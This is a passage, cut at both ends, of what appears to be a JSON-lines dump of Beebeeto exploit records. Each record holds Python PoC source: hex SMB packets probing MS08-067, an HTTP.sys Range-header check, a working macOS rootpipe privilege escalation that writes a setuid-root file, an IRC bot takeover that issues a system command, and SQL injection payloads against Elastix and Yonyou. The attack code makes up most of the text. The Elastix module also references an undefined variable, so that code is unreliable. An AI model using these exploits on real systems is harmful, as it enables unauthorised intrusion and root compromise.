Server\u670d\u52a1RPC\u8bf7\u6c42\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\u201d\uff0c\u5982\u679c\u7528\u6237\u5728\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u4e0a\u6536\u5230\u7279\u5236\u7684 RPC\r\n \u8bf7\u6c42\uff0c\u5219\u8be5\u6f0f\u6d1e\u53ef\u80fd\u5141\u8bb8\u8fdc\u7a0b\u6267\u884c\u4ee3\u7801\u3002 \u5728 Microsoft Windows 2000\u3001Windows XP \u548c Windows Server 2003 \u7cfb\u7edf\u4e0a\uff0c\r\n 
\u653b\u51fb\u8005\u53ef\u80fd\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u5373\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u8fd0\u884c\u4efb\u610f\u4ee3\u7801\uff0c\u6b64\u6f0f\u6d1e\u53ef\u7528\u4e8e\u8fdb\u884c\u8815\u866b\u653b\u51fb\u3002\r\n -----\r\n This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service.\r\n This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to\r\n prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to\r\n handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This\r\n is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in\r\n development.\r\n ''',\r\n 'references': ['https://labs.portcullis.co.uk/tools/ms08-067-check/',\r\n 'https://technet.microsoft.com/en-us/library/security/ms08-067.aspx'],\r\n },\r\n }\r\n\r\n\r\n def _init_user_parser(self): # \u5b9a\u5236\u547d\u4ee4\u884c\u53c2\u6570\r\n self.user_parser.add_option('-p','--port',\r\n action='store', dest='port', type=int, default=445,\r\n help='request port.')\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n ip = http.transform_target_ip(http.normalize_url(args['options']['target']))\r\n port = args['options']['port']\r\n payload = [\r\n ('00000045ff534d427200000000000008000000000000000000000000ffff00000000000000220'\r\n '0024e54204c4d20302e31320002534d4220322e3030320002534d4220322e3f3f3f00').decode('hex'),\r\n ('00000088ff534d427300000000080048000000000000000000000000ffffc42b000000000cff0'\r\n '0000000f0020001000000000042000000000044c000804d00604006062b0601050502a0363034'\r\n 'a00e300c060a2b06010401823702020aa22204204e544c4d5353500001000000050288a000000'\r\n '000000000000000000000000000556e69780053616d626100').decode('hex'),\r\n 
('00000096ff534d427300000000080048000000000000000000000000ffffc42b010800000cff0'\r\n '0000000f0020001000000000050000000000044c000805b00a14e304ca24a04484e544c4d5353'\r\n '50000300000000000000480000000000000048000000000000004000000000000000400000000'\r\n '8000800400000000000000048000000050288a04e0055004c004c00556e69780053616d626100').decode('hex'),\r\n '00000047ff534d427500000000080048000000000000000000000000ffffc42b0108000004ff000000000001001c0000'.decode('hex'),\r\n ('0000005cff534d42a2000000001801480000000000000000000000000108c42b0108000018ff0'\r\n '00000000800160000000000000003000000000000000000000080000000010000000100000040'\r\n '000000020000000009005c62726f7773657200').decode('hex'),\r\n ('00000092ff534d4225000000000801480000000000000000000000000108c42b0108000010000'\r\n '048000004e0ff0000000000000000000000004a0048004a000200260000404f005c504950455c'\r\n '0005000b03100000004800000001000000b810b810000000000100000000000100c84f324b701'\r\n '6d30112785a47bf6ee18803000000045d888aeb1cc9119fe808002b10486002000000').decode('hex'),\r\n ('000000beff534d4225000000000801480000000000000000000000000108c42b0108000010000'\r\n '074000004e0ff0000000000000000000000004a0074004a000200260000407b005c504950455c'\r\n '00050000031000000074000000010000000000000000002000000002000100000000000000010'\r\n '000000000aaaa0e000000000000000e0000005c00410041004100410041005c002e002e005c00'\r\n '46004200560000000500000000000000050000005c004600420056000000aaaa0100000000000000').decode('hex'),\r\n ]\r\n\r\n def setuserid(userid,data):\r\n return data[:32]+userid+data[34:]\r\n def settreeid(treeid,data):\r\n return data[:28]+treeid+data[30:]\r\n def setfid(fid,data):\r\n return data[:67]+fid+data[69:]\r\n if args['options']['verbose']:\r\n print '[*] Connect {}:{}'.format(ip,port)\r\n s = socket.socket()\r\n s.connect((ip,port))\r\n s.send(payload[0])\r\n s.recv(1024)\r\n s.send(payload[1])\r\n data = s.recv(1024)\r\n userid = data[32:34]\r\n s.send(setuserid(userid,payload[2]))\r\n s.recv(1024)\r\n 
data = setuserid(userid,payload[3])\r\n path = '\\\\\\\\%s\\\\IPC$\\x00' % ip\r\n path = path + (26-len(path))*'\\x3f'+'\\x00'\r\n data = data + path\r\n s.send(data)\r\n data = s.recv(1024)\r\n tid = data[28:30]\r\n s.send(settreeid(tid,setuserid(userid,payload[4])))\r\n data = s.recv(1024)\r\n fid = data[42:44]\r\n s.send(setfid(fid,settreeid(tid,setuserid(userid,payload[5]))))\r\n s.recv(1024)\r\n s.send(setfid(fid,settreeid(tid,setuserid(userid,payload[6]))))\r\n data = s.recv(1024)\r\n if data[9:13]=='\\x00'*4:\r\n print \"[+] Looks Vulnerability!\"\r\n args['success'] = True\r\n args['poc_ret']['vulnerability'] = '%s:%d' % (ip, port)\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "MS08-067\u6f0f\u6d1e\u7684\u5168\u79f0\u4e3a\u201cWindows Server\u670d\u52a1RPC\u8bf7\u6c42\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\u201d\uff0c\u5982\u679c\u7528\u6237\u5728\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u4e0a\u6536\u5230\u7279\u5236\u7684 RPC\r\n\u8bf7\u6c42\uff0c\u5219\u8be5\u6f0f\u6d1e\u53ef\u80fd\u5141\u8bb8\u8fdc\u7a0b\u6267\u884c\u4ee3\u7801\u3002 \u5728 Microsoft Windows 2000\u3001Windows XP \u548c Windows Server 2003 \u7cfb\u7edf\u4e0a\uff0c\r\n\u653b\u51fb\u8005\u53ef\u80fd\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u5373\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u8fd0\u884c\u4efb\u610f\u4ee3\u7801\uff0c\u6b64\u6f0f\u6d1e\u53ef\u7528\u4e8e\u8fdb\u884c\u8815\u866b\u653b\u51fb\u3002\r\n-----\r\nThis module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service.\r\nThis module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to\r\nprevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to\r\nhandle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. 
This\r\nis just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in\r\ndevelopment.", "app_name": "Windows", "id": "poc-2015-0085", "layer4_protocol": null}
{"create_date": "2015-04-15 16:31:02", "name": "IIS HTTP.sys \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e(CVE-2015-1635) POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "user1018", "rank": 6, "port": null, "vul_type": "\u4ee3\u7801\u6267\u884c", "tag": "IIS\u6f0f\u6d1e,HTTP.sys\u6f0f\u6d1e,CVE-2015-1635,ms15-034", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport socket\r\nimport random\r\nimport urlparse\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0081',\r\n 'name': 'IIS HTTP.sys \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e(CVE-2015-1635) POC',\r\n 'author': 'user1018',\r\n 'create_date': '2015-04-15',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'IIS',\r\n 'vul_version': ['>7.0'],\r\n 'type': 'Code Execution',\r\n 'tag': ['IIS\u6f0f\u6d1e', 'HTTP.sys\u6f0f\u6d1e', 'CVE-2015-1635', 'ms15-034'],\r\n 'desc': '''\r\n \u5f71\u54cd\u8303\u56f4:\r\n Windows7\r\n Windows8\r\n Windows server 2008\r\n Windows server 2012\r\n \u8fdc\u7a0b\u6267\u884c\u4ee3\u7801\u6f0f\u6d1e\u5b58\u5728\u4e8e HTTP \u534f\u8bae\u5806\u6808 (HTTP.sys) \u4e2d\uff0c\u5f53 HTTP.sys \u672a\u6b63\u786e\u5206\u6790\u7ecf\u7279\u6b8a\u8bbe\u8ba1\u7684 HTTP \u8bf7\u6c42\r\n \u65f6\u4f1a\u5bfc\u81f4\u6b64\u6f0f\u6d1e\u3002 \u6210\u529f\u5229\u7528\u6b64\u6f0f\u6d1e\u7684\u653b\u51fb\u8005\u53ef\u4ee5\u5728\u7cfb\u7edf\u5e10\u6237\u7684\u4e0a\u4e0b\u6587\u4e2d\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n\r\n 
\u82e5\u8981\u5229\u7528\u6b64\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u5fc5\u987b\u5c06\u7ecf\u7279\u6b8a\u8bbe\u8ba1\u7684 HTTP \u8bf7\u6c42\u53d1\u9001\u5230\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u3002 \u901a\u8fc7\u4fee\u6539 Windows HTTP \u5806\u6808\u5904\u7406\r\n \u8bf7\u6c42\u7684\u65b9\u5f0f\uff0c\u5b89\u88c5\u66f4\u65b0\u53ef\u4ee5\u4fee\u590d\u6b64\u6f0f\u6d1e\u3002\r\n ''',\r\n 'references': ['https://technet.microsoft.com/zh-CN/library/security/ms15-034.aspx',\r\n 'http://bobao.360.cn/news/detail/1435.html'],\r\n },\r\n }\r\n\r\n\r\n def _init_user_parser(self): # \u5b9a\u5236\u547d\u4ee4\u884c\u53c2\u6570\r\n self.user_parser.add_option('-p','--port',\r\n action='store', dest='port', type=int, default=80,\r\n help='request port.')\r\n self.user_parser.add_option('--timeout',\r\n action='store', dest='timeout', type=int, default=5,\r\n help='request timeout.')\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n target = args['options']['target']\r\n port = args['options']['port']\r\n timeout = args['options']['timeout']\r\n if urlparse.urlparse(target).netloc == '':\r\n target = urlparse.urlparse(target).path\r\n else:\r\n target = socket.gethostbyname(urlparse.urlparse(target).netloc)\r\n \r\n headers = {\r\n 'User-Agent': 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',\r\n }\r\n \r\n if port == 443:\r\n url = 'https://%s:%d' % (target, port)\r\n else:\r\n url = 'http://%s:%d' % (target, port)\r\n r = requests.get(url, verify=False, headers=headers, timeout=timeout)\r\n if not r.headers.get('server') or \"Microsoft\" not in r.headers.get('server'):\r\n args['poc_ret']['error'] = '[-] Not IIS'\r\n return args\r\n\r\n hexAllFfff = '18446744073709551615'\r\n headers.update({\r\n 'Host': 'stuff',\r\n 'Range': 'bytes=0-' + hexAllFfff,\r\n })\r\n r = requests.get(url, verify=False, headers=headers, timeout=timeout)\r\n if \"Requested Range Not Satisfiable\" in r.content:\r\n print \"[+] Looks Vulnerability!\"\r\n args['success'] = 
True\r\n args['poc_ret']['vulnerability'] = '%s:%d' % (target, port)\r\n elif \"The request has an invalid header name\" in r.content:\r\n args['poc_ret']['error'] = \"[-] Looks Patched\"\r\n else:\r\n args['poc_ret']['error'] = \"[-] Unexpected response, cannot discern patch status\"\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u5f71\u54cd\u8303\u56f4:\r\n Windows7\r\n Windows8\r\n Windows server 2008\r\n Windows server 2012\r\n\u8fdc\u7a0b\u6267\u884c\u4ee3\u7801\u6f0f\u6d1e\u5b58\u5728\u4e8e HTTP \u534f\u8bae\u5806\u6808 (HTTP.sys) \u4e2d\uff0c\u5f53 HTTP.sys \u672a\u6b63\u786e\u5206\u6790\u7ecf\u7279\u6b8a\u8bbe\u8ba1\u7684 HTTP \u8bf7\u6c42\r\n\u65f6\u4f1a\u5bfc\u81f4\u6b64\u6f0f\u6d1e\u3002 \u6210\u529f\u5229\u7528\u6b64\u6f0f\u6d1e\u7684\u653b\u51fb\u8005\u53ef\u4ee5\u5728\u7cfb\u7edf\u5e10\u6237\u7684\u4e0a\u4e0b\u6587\u4e2d\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n\r\n\u82e5\u8981\u5229\u7528\u6b64\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u5fc5\u987b\u5c06\u7ecf\u7279\u6b8a\u8bbe\u8ba1\u7684 HTTP \u8bf7\u6c42\u53d1\u9001\u5230\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u3002 \u901a\u8fc7\u4fee\u6539 Windows HTTP \u5806\u6808\u5904\u7406\r\n\u8bf7\u6c42\u7684\u65b9\u5f0f\uff0c\u5b89\u88c5\u66f4\u65b0\u53ef\u4ee5\u4fee\u590d\u6b64\u6f0f\u6d1e\u3002", "app_name": "IIS", "id": "poc-2015-0081", "layer4_protocol": null}
{"create_date": "2015-04-10 11:45:23", "name": "Mac OS X rootpipe \u672c\u5730\u6743\u9650\u63d0\u5347\u6f0f\u6d1e (CVE-2015-1130) Exploit", "level": "\u9ad8\u5371", "batchable": 0, "author": "\u96f7\u8702", "rank": 5, "port": null, "vul_type": "\u5176\u4ed6\u7c7b\u578b", "tag": "Mac OS X \u63d0\u6743\u6f0f\u6d1e,Mac OS X rootpipe Local Privilege Escalation Vulnerability,CVE-2015-1130", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport os\r\nimport objc\r\nimport ctypes\r\nimport platform\r\n\r\nfrom Cocoa import NSData, NSMutableDictionary, NSFilePosixPermissions\r\nfrom Foundation import NSAutoreleasePool\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0079',\r\n 'name': 'Mac OS X rootpipe \u672c\u5730\u6743\u9650\u63d0\u5347\u6f0f\u6d1e (CVE-2015-1130) Exploit',\r\n 'author': 'Emil Kvarnhammar',\r\n 'create_date': '2015-04-10',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'local',\r\n 'port': [0],\r\n 'layer4_protocol': [],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Mac OS X',\r\n 'vul_version': ['10.7.5', '10.8.2', '10.9.5', '10.10.2'],\r\n 'type': 'Other',\r\n 'tag': ['Mac OS X \u63d0\u6743\u6f0f\u6d1e', 'Mac OS X rootpipe Local Privilege Escalation Vulnerability',\r\n 'CVE-2015-1130',],\r\n 'desc': '''\r\n PoC exploit code for rootpipe (CVE-2015-1130)\r\n Created by Emil Kvarnhammar, TrueSec\r\n Tested on OS X 10.7.5, 10.8.2, 10.9.5 and 10.10.2\r\n # Usage: python exploit.py -t bashtest -d bashroot\r\n ''',\r\n 'references': [\r\n 'http://www.exploit-db.com/exploits/36692/',\r\n 'http://drops.wooyun.org/tips/5566',\r\n ],\r\n },\r\n }\r\n\r\n def _init_user_parser(self): # 
\u5b9a\u5236\u547d\u4ee4\u884c\u53c2\u6570\r\n self.user_parser.add_option('-d','--dest_binary',\r\n action='store', dest='dest_binary', type='string', default=None,\r\n help='dest_binary')\r\n\r\n\r\n @staticmethod\r\n def load_lib(append_path):\r\n return ctypes.cdll.LoadLibrary(\"/System/Library/PrivateFrameworks/\" + append_path);\r\n\r\n @staticmethod\r\n def use_old_api():\r\n return re.match(\"^(10.7|10.8)(.\\d)?$\", platform.mac_ver()[0])\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n source_binary = args['options']['target']\r\n dest_binary = os.path.realpath(args['options']['dest_binary'])\r\n\r\n if not os.path.exists(source_binary):\r\n raise Exception(\"file does not exist!\")\r\n\r\n pool = NSAutoreleasePool.alloc().init()\r\n\r\n attr = NSMutableDictionary.alloc().init()\r\n attr.setValue_forKey_(04777, NSFilePosixPermissions)\r\n data = NSData.alloc().initWithContentsOfFile_(source_binary)\r\n\r\n print \"[*] will write file\", dest_binary\r\n\r\n if cls.use_old_api():\r\n adm_lib = cls.load_lib(\"/Admin.framework/Admin\")\r\n Authenticator = objc.lookUpClass(\"Authenticator\")\r\n ToolLiaison = objc.lookUpClass(\"ToolLiaison\")\r\n SFAuthorization = objc.lookUpClass(\"SFAuthorization\")\r\n\r\n authent = Authenticator.sharedAuthenticator()\r\n authref = SFAuthorization.authorization()\r\n\r\n # authref with value nil is not accepted on OS X <= 10.8\r\n authent.authenticateUsingAuthorizationSync_(authref)\r\n st = ToolLiaison.sharedToolLiaison()\r\n tool = st.tool()\r\n tool.createFileWithContents_path_attributes_(data, dest_binary, attr)\r\n else:\r\n adm_lib = cls.load_lib(\"/SystemAdministration.framework/SystemAdministration\")\r\n WriteConfigClient = objc.lookUpClass(\"WriteConfigClient\")\r\n client = WriteConfigClient.sharedClient()\r\n client.authenticateUsingAuthorizationSync_(None)\r\n tool = client.remoteProxy()\r\n\r\n tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0)\r\n\r\n print \"[+] Done!\"\r\n del 
pool\r\n args['success'] = True\r\n args['poc_ret']['dest_binary'] = dest_binary\r\n return args\r\n\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "PoC exploit code for rootpipe (CVE-2015-1130)\r\nCreated by Emil Kvarnhammar, TrueSec\r\nTested on OS X 10.7.5, 10.8.2, 10.9.5 and 10.10.2\r\n# Usage: python exploit.py -t bashtest -d bashroot", "app_name": "Mac OS", "id": "poc-2015-0079", "layer4_protocol": null}
{"create_date": "2015-04-07 10:25:59", "name": "w3tw0rk / Pitbull Perl IRC Bot \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e Exploit", "level": "\u9ad8\u5371", "batchable": 0, "author": "foundu", "rank": 4, "port": null, "vul_type": "\u4ee3\u7801\u6267\u884c", "tag": "w3tw0rk / Pitbull Perl IRC Bot \u6f0f\u6d1e,w3tw0rk / Pitbull Perl IRC Bot Vulnerability", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport socket\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0077',\r\n 'name': 'w3tw0rk / Pitbull Perl IRC Bot \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e Exploit',\r\n 'author': 'foundu',\r\n 'create_date': '2015-04-07',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [6667],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'w3tw0rk / Pitbull Perl IRC',\r\n 'vul_version': ['*'],\r\n 'type': 'Code Execution',\r\n 'tag': ['w3tw0rk / Pitbull Perl IRC Bot \u6f0f\u6d1e', 'w3tw0rk / Pitbull Perl IRC Bot Vulnerability'],\r\n 'desc': '''\r\n pitbull-w3tw0rk_hunter is POC exploit for Pitbull or w3tw0rk IRC Bot\r\n that takes over the owner of a bot which then allows Remote Code Execution.\r\n ''',\r\n 'references': ['http://www.exploit-db.com/exploits/36652/',\r\n ],\r\n },\r\n }\r\n\r\n def _init_user_parser(self): # \u5b9a\u5236\u547d\u4ee4\u884c\u53c2\u6570\r\n self.user_parser.add_option('-c','--channel',\r\n action='store', dest='channel', type='string', default=None,\r\n help='IRC channel')\r\n self.user_parser.add_option('-n','--nick',\r\n action='store', dest='nick', type='string', default='beebeeto',\r\n help='IRC nick')\r\n\r\n @classmethod\r\n def 
verify(cls, args):\r\n #irc server connection settings\r\n server = args['options']['target'] # IRC Server\r\n botnick = args['options']['nick'] # admin payload for taking over the w3wt0rk bot\r\n channel = \"#%s\"%args['options']['channel'] #channel where the bot is located\r\n\r\n irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #defines the socket\r\n print \"connecting to: \" + server\r\n irc.connect((server, 6667)) #connects to the server\r\n irc.send(\"USER \"+ botnick +\" \"+ botnick +\" \"+ botnick +\" :I eat w3tw0rk bots!\\n\") #user authentication\r\n irc.send(\"NICK \"+ botnick +\"\\n\") #sets nick\r\n irc.send(\"JOIN \"+ channel +\"\\n\") #join the chan\r\n irc.send(\"PRIVMSG \"+channel+\" :!bot @system 'uname -a' \\n\") #send the payload to the bot\r\n\r\n #puts it in a loop\r\n while True:\r\n text = irc.recv(2040)\r\n print text #print text to console\r\n if text.find('PING') != -1: #check if 'PING' is found\r\n irc.send('PONG ' + text.split() [1] + '\\r\\n') #returnes 'PONG' back to the server (prevents pinging out!)\r\n if text.find('!quit') != -1: #quit the Bot\r\n irc.send (\"QUIT\\r\\n\") \r\n return args\r\n if text.find('Linux') != -1: \r\n irc.send(\"PRIVMSG \"+channel+\" :The bot answers to \"+botnick+\" which allows command execution \\r\\n\")\r\n irc.send (\"QUIT\\r\\n\")\r\n args['success'] = True\r\n return args\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "pitbull-w3tw0rk_hunter is POC exploit for Pitbull or w3tw0rk IRC Bot\r\nthat takes over the owner of a bot which then allows Remote Code Execution.", "app_name": "Other", "id": "poc-2015-0077", "layer4_protocol": null}
{"create_date": "2015-04-06 16:28:12", "name": "Elastix 2.x /a2billing/customer/iridium_threed.php BLIND SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 0, "author": "Ca2fux1n", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "Elastix\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/iridium_threed.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport time\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0076',\r\n 'name': 'Elastix 2.x /a2billing/customer/iridium_threed.php BLIND SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'ca2fux1n',\r\n 'create_date': '2015-03-15',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Elastix',\r\n 'vul_version': ['2.x'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['Elastix\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/iridium_threed.php', 'php'],\r\n 'desc': '''\r\n Vulnerable Source Code snippet in \"a2billing/customer/iridium_threed.php\"\r\n ''',\r\n 'references': ['http://www.exploit-db.com/exploits/36305/',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + '/a2billing/customer/iridium_threed.php'\r\n payload = '?transactionID=-1 and 1=benchmark(2000000,md5(1))'\r\n start_time = time.time()\r\n if args['options']['verbose']:\r\n print '[+] Requset:' + verify_url\r\n print '[+] Payload:' + payload\r\n req = requests.get(verify_url + payload)\r\n if req.status_code == 200 and time.time() - start_time > 5:\r\n args['success'] = True\r\n 
args['poc_ret']['vul_url'] = verify_url + paylaod\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == \"__main__\":\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Vulnerable Source Code snippet in \"a2billing/customer/iridium_threed.php\"", "app_name": "Other", "id": "poc-2015-0076", "layer4_protocol": null}
{"create_date": "2015-04-01 14:13:19", "name": "\u7528\u53cbNC-IUFO\u7cfb\u7edf /epp/detail/publishinfodetail.jsp SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "Ca2fux1n", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "\u7528\u53cbNC-IUFO\u6f0f\u6d1e,/epp/detail/publishinfodetail.jsp,SQL Injection,JSP", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0075',\r\n 'name': '\u7528\u53cbNC-IUFO\u7cfb\u7edf /epp/detail/publishinfodetail.jsp SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'ca2fux1n',\r\n 'create_date': '2015-03-31',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': '\u7528\u53cbNC-IUFO',\r\n 'vul_version': ['*'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['\u7528\u53cbNC-IUFO\u6f0f\u6d1e', '/epp/detail/publishinfodetail.jsp', 'SQL Injection', 'JSP'],\r\n 'desc': 'param `pk_message` is not filterd',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-089208'],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n url = args['options']['target']\r\n url = url if url[-1] != '/' else url[:-1]\r\n payload = (\"/epp/detail/publishinfodetail.jsp?pk_message=1002F410000000019JNX%27%20\"\r\n \"AND%203814=(SELECT%20UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(99)||\"\r\n \"CHR(122)||CHR(103)||CHR(113)||(SELECT%20(CASE%20WHEN%20(3814=3814)%20THEN\"\r\n \"%201%20ELSE%200%20END)%20FROM%20DUAL)||CHR(113)||CHR(110)||CHR(111)||CHR(105)\"\r\n 
\"||CHR(113)||CHR(62)))%20FROM%20DUAL)%20AND%20%27vdoA%27=%27vdoA\")\r\n verify_url = url + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: %s' % verify_url\r\n req = requests.get(verify_url)\r\n content = req.content\r\n if req.status_code == 500 and 'qczgq1qnoiq' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == \"__main__\":\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "param `pk_message` is not filterd", "app_name": "\u7528\u53cb\uff08Yonyou\uff09", "id": "poc-2015-0075", "layer4_protocol": null}
{"create_date": "2015-03-30 17:08:36", "name": "ShopBuilder /?m=product&s=list&ptype SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "foundu", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "ShopBuilder\u6f0f\u6d1e,/?m=product&s=list&ptype,SQL Injection,ShopBuilder", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0074',\r\n 'name': 'ShopBuilder /?m=product&s=list&ptype SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'foundu',\r\n 'create_date': '2015-03-30',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 